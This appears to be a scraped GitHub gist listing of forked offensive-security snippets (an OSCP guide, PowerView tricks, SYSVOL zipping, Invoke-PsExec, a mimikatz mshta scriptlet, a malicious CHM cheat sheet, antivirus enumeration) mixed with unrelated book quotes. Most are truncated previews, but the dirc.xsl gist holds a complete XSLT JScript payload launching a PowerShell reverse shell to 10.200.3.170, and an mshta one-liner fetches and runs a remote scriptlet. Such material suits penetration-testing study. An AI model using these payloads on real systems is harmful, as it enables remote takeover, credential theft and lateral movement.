- Recon
- Find vuln
- Exploit
- Escalate
- Document it
thebigplate
/ how-to-oscp-final.md
Created
September 22, 2018 18:43
— forked from meldridge/how-to-oscp-final.md
How to pass the OSCP
thebigplate
/ dirc.xsl
Created
October 17, 2018 01:18
— forked from padovah4ck/dirc.xsl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command \"$client = New-Object System.Net.Sockets.TCPClient('10.200.3.170',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",0,true); | |
| ]]> </ms:script> |
thebigplate
/ PowerView-3.0-tricks.ps1
Created
October 17, 2018 01:23
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
thebigplate
/ New-SYSVOLZip.ps1
Created
October 17, 2018 02:56
— forked from HarmJ0y/New-SYSVOLZip.ps1
Compresses all of SYSVOL to a local .zip file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function New-SYSVOLZip { | |
| <# | |
| .SYNOPSIS | |
| Compresses all folders/files in SYSVOL to a .zip file. | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
thebigplate
/ Invoke-Psexec.ps1
Created
October 17, 2018 02:56
— forked from HarmJ0y/Invoke-Psexec.ps1
Invoke-Psexec
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-PsExec { | |
| <# | |
| .SYNOPSIS | |
| This function is a rough port of Metasploit's psexec functionality. | |
| It utilizes Windows API calls to open up the service manager on | |
| a remote machine, creates/run a service with an associated binary | |
| path or command, and then cleans everything up. | |
| Either a -Command or a custom -ServiceEXE can be specified. | |
| For -Commands, a -ResultsFile can also be specified to retrieve the |
thebigplate
/ it-doesn't-have-to-be-crazy-at-work.md
Created
April 7, 2019 16:00
Some of my favorite quotes from "It Doesn't Have To Be Crazy At Work" by Jason Fried and David Heinemeier Hansson
Any mistakes are my own. Basecamp is a modern software company that (by many estimates) generates millions of dollars in profit each month.
Since the beginning of Basecamp, we've been loath to make promises about future product improvements. We've always wanted customers to judge the product they could buy and use today, not some imaginary version that might exist in the future.
Chat puts conversations on conveyor belts that are perpetually moving away from you. If you're not at your station when the conversation rolls by, you'll never get a chance to put in your two cents. This means if you want to have your say, you need to be paying attention all day (and often to multiple rooms/channels). ... Chat is great for hashing stuff our quickly when speed truly is important. ... It's also great for watercooler-like banter ... building a camaraderie among people during gaps in the workday.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Net.Sockets; |
thebigplate
/ mimikatz.sct
Created
August 7, 2020 00:29
— forked from chrismaddalena/mimikatz.sct
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
thebigplate
/ Malicious-CHM-Guide.md
Created
January 26, 2021 23:13
— forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).
- Step 0: Download and install Microsoft HTML Help Workshop and Documentation
- Step 1: Obtain a valid CHM file and unpack it using 7-zip
- Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's
<body>section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
thebigplate
/ Get-AntiVirusProduct.ps1
Created
January 26, 2021 23:26
— forked from mgeeky/Get-AntiVirusProduct.ps1
Lists installed AntiVirus products and their details. Source: https://stackoverflow.com/a/37842942
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-AntiVirusProduct { | |
| [CmdletBinding()] | |
| param ( | |
| [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] | |
| [Alias('name')] | |
| $computername=$env:computername | |
| ) |
OlderNewer